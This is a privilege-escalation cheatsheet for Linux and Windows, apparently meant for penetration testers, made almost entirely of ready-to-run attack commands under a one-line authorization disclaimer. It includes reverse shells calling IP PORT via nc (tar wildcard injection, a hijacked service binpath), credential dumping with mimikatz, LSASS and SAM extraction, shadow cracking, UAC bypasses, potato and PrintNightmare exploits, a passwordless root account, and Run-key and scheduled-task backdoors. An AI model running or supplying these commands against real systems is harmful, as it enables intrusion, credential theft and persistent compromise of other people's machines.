Privilege Escalation Cheatsheet


A complete guide to privilege escalation techniques for Linux and Windows: commands, exploits and methodologies for penetration testing.

Disclaimer

Use these techniques only on systems for which you have explicit authorization. Unauthorized access and privilege escalation are illegal and can carry serious legal consequences.


Useful Combined Commands

Linux Full Enum
Full enumeration of a Linux system
uname -a && cat /etc/issue && id && sudo -l && getcap -r / 2>/dev/null && find / -perm -4000 2>/dev/null
SUID Quick Search
Quick search for interesting SUID binaries
find / -perm -4000 -type f 2>/dev/null | xargs ls -la
Windows Full Enum
Full enumeration of a Windows system
systeminfo && whoami /all && net user && net localgroup administrators && sc query state=all
Service Exploit Check
Check for auto-start Windows services outside C:\Windows (the trailing backslash is doubled because findstr treats a single backslash as an escape)
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"
Password Hunting Linux
Search for passwords and credentials on Linux
grep -r "password" /home/ 2>/dev/null && grep -i passw ~/.bash_history && env | grep -i pass
Password Hunting Windows
Search for passwords and credentials on Windows
findstr /si password *.txt *.xml *.ini *.config && reg query HKLM /f password /t REG_SZ /s

System Enumeration (Linux)

uname -a
Kernel and system info
uname -a
cat /etc/issue
Linux distribution
cat /etc/issue
cat /etc/*-release
OS version info
cat /etc/*-release
hostname
Host name
hostname
id
Current user info
id
whoami
Current user name
whoami
w
Logged-in users
w
cat /etc/passwd
List system users (excluding nologin accounts)
grep -v nologin /etc/passwd

Sudo & Permissions

sudo -l
Available sudo commands
sudo -l
sudo -i
Interactive root shell
sudo -i
sudo -s
Shell with sudo privileges
sudo -s
sudo su -
Switch to root
sudo su -
cat /etc/sudoers
sudoers configuration
cat /etc/sudoers
sudo LD_PRELOAD
LD_PRELOAD exploit (only works when sudoers keeps LD_PRELOAD via env_keep)
sudo LD_PRELOAD=/tmp/evil.so program
sudo python -c
Python shell via sudo
sudo python -c 'import os;os.system("/bin/bash")'
GTFOBins
Look up exploitable sudo binaries
https://gtfobins.github.io/

SUID/SGID Binaries

find SUID
Find SUID files
find / -perm -4000 -type f 2>/dev/null
find SGID
Find SGID files
find / -perm -2000 -type f 2>/dev/null
find SUID+SGID
Find files that are both SUID and SGID
find / -perm -6000 -type f 2>/dev/null
find writable
Files writable by the current (non-root) user
find / -writable -type f 2>/dev/null | grep -v proc
nmap SUID
nmap interactive exploit
nmap --interactive; !sh
vim SUID
vim/vi exploit
vim -c ':!/bin/bash'
cp SUID
Copy /etc/passwd and append a passwordless UID 0 user
cp /etc/passwd /tmp/passwd && echo "root2::0:0:::/bin/bash" >> /tmp/passwd

Linux Capabilities

getcap
List capabilities
getcap -r / 2>/dev/null
getcap binary
Check a binary's capabilities
getcap /usr/bin/python3.8
CAP_SETUID
Python CAP_SETUID exploit
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
CAP_DAC_READ_SEARCH
Read privileged files
tar -czvf /tmp/shadow.tar.gz /etc/shadow
setcap
Set a capability
setcap cap_setuid+ep /usr/bin/python3

Cron Jobs

crontab -l
User cron jobs
crontab -l
cat /etc/crontab
System crontab
cat /etc/crontab
ls cron.d
cron.d directory
ls -la /etc/cron.d/
cat cron.*
Periodic cron jobs
cat /etc/cron.daily/* /etc/cron.hourly/*
pspy
Monitor processes
./pspy64 -pf -i 1000
writable cron
Find writable cron files
find /etc/cron* -type f -writable 2>/dev/null

Services & Processes

ps aux
Running processes (owned by root)
ps aux | grep root
ps -ef
Full process list
ps -ef | grep -v \[
systemctl
systemd services
systemctl list-units --type=service
netstat
Listening ports
netstat -tulpn | grep LISTEN
ss -tulpn
Socket statistics
ss -tulpn
service --status-all
Service status
service --status-all

Kernel Exploits

uname -r
Kernel version
uname -r
searchsploit
Search for kernel exploits
searchsploit linux kernel 4.15
DirtyCow
CVE-2016-5195
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty
linux-exploit-suggester
Suggests exploits
./linux-exploit-suggester.sh
LinEnum
Automated enumeration
./LinEnum.sh -t

Passwords & Credentials (Linux)

cat /etc/shadow
Password hashes
cat /etc/shadow
unshadow
Combine passwd and shadow
unshadow /etc/passwd /etc/shadow > hashes.txt
john
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
history
Command history
grep -i passw ~/.bash_history
find passwords
Search for password files
grep -r "password" /home/ 2>/dev/null
env
Environment variables
env | grep -i pass
ssh keys
SSH keys
find / -name id_rsa 2>/dev/null

Wildcard & Path Injection

tar wildcard
tar wildcard exploit
echo "mkfifo /tmp/f;nc IP PORT 0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f" > shell.sh && chmod +x shell.sh && touch -- --checkpoint=1 --checkpoint-action=exec=sh\ shell.sh
chown wildcard
chown wildcard
touch -- --reference=/root/file.txt
PATH injection
Hijack PATH
export PATH=/tmp:$PATH && echo "/bin/bash" > /tmp/ls && chmod +x /tmp/ls

Docker & Containers

docker group
Check docker group membership
groups | grep docker
docker privesc
Mount the host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker ps
Running containers
docker ps -a
docker images
Available images
docker images

System Enumeration (Windows)

systeminfo
System information
systeminfo
hostname
Computer name
hostname
whoami
Current user
whoami /all
net user
List users
net user
net localgroup
Local groups
net localgroup administrators
netstat
Network connections
netstat -ano
ipconfig
Network configuration
ipconfig /all
route
Routing table
route print

Windows Services

sc query
List services
sc query state=all
wmic service
WMIC service info
wmic service get name,pathname,startmode
icacls
File/directory permissions
icacls "C:\Program Files\Service"
accesschk
Check service permissions
accesschk.exe -uwcqv "Everyone" *
sc qc
Service configuration
sc qc VulnService
sc config
Modify a service
sc config VulnService binpath= "C:\temp\nc.exe -nv IP PORT -e cmd.exe"
net start
Start a service
net start VulnService

Registry & AutoRuns

reg query Run
AutoRun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query RunOnce
RunOnce registry key
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query AlwaysInstallElevated
AlwaysInstallElevated check (the policy only takes effect when set in both HKLM and HKCU)
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated && reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg add
Add a registry key
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

UAC Bypass

eventvwr.exe
eventvwr UAC bypass
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe" /f
fodhelper.exe
fodhelper UAC bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f
computerdefaults
ComputerDefaults bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell.exe" /f
UACMe
Automated bypass tool
Akagi64.exe 23

Token Manipulation

whoami /priv
Current privileges
whoami /priv
incognito
Meterpreter incognito
load incognito; list_tokens -u
impersonate_token
Impersonate a token
impersonate_token "NT AUTHORITY\SYSTEM"
SeImpersonatePrivilege
Potato exploits
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
PrintSpoofer
PrintSpoofer exploit
PrintSpoofer.exe -i -c cmd
RoguePotato
RoguePotato exploit
RoguePotato.exe -r IP -e "cmd.exe"

Passwords & Credentials (Windows)

cmdkey
Saved credentials
cmdkey /list
findstr password
Search for passwords in files
findstr /si password *.txt *.xml *.ini
reg query HKLM
Passwords in the registry
reg query HKLM /f password /t REG_SZ /s
SAM dump
Extract SAM hashes
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive
mimikatz
Mimikatz dump
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
lsass dump
Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
unattend.xml
Passwords in unattend
type C:\Windows\Panther\Unattend.xml

Exploits & CVEs

wes.py
Windows Exploit Suggester
wes.py systeminfo.txt
EternalBlue
MS17-010
use exploit/windows/smb/ms17_010_eternalblue
MS16-032
Secondary Logon Handle
Invoke-MS16032 -Command "cmd.exe"
MS15-051
Client Copy Image
ms15-051x64.exe "cmd.exe"
PrintNightmare
CVE-2021-1675
Invoke-Nightmare -DLL \\IP\share\nightmare.dll

DLL Hijacking

procmon
Process Monitor
procmon.exe /AcceptEula /Quiet
PATH DLL
DLL search order
echo %PATH%
missing DLL
Find missing DLLs
listdlls.exe -u | findstr "not found"
icacls writable
Writable directories
icacls "C:\Program Files\App" | findstr "(M)" | findstr "Everyone"

Scheduled Tasks

schtasks
List scheduled tasks
schtasks /query /fo LIST /v
taskschd.msc
Task Scheduler GUI
taskschd.msc
icacls task
Task file permissions
icacls C:\Tasks\backup.bat
schtasks create
Create a scheduled task
schtasks /create /tn Backdoor /tr "C:\backdoor.exe" /sc onstart /ru System
